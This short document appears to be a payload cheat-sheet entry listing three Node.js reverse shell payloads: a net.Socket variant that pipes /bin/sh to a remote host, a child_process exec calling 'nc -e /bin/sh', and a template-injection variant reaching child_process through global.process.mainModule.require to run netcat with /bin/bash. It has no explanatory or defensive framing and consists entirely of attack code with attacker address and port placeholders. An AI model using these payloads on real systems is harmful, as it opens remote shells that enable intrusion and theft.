(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect($port, "$local_ip", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

# or

require('child_process').exec('nc -e /bin/sh $local_ip $port')

# or

-var x = global.process.mainModule.require
-x('child_process').exec('nc $local_ip $port -e /bin/bash')

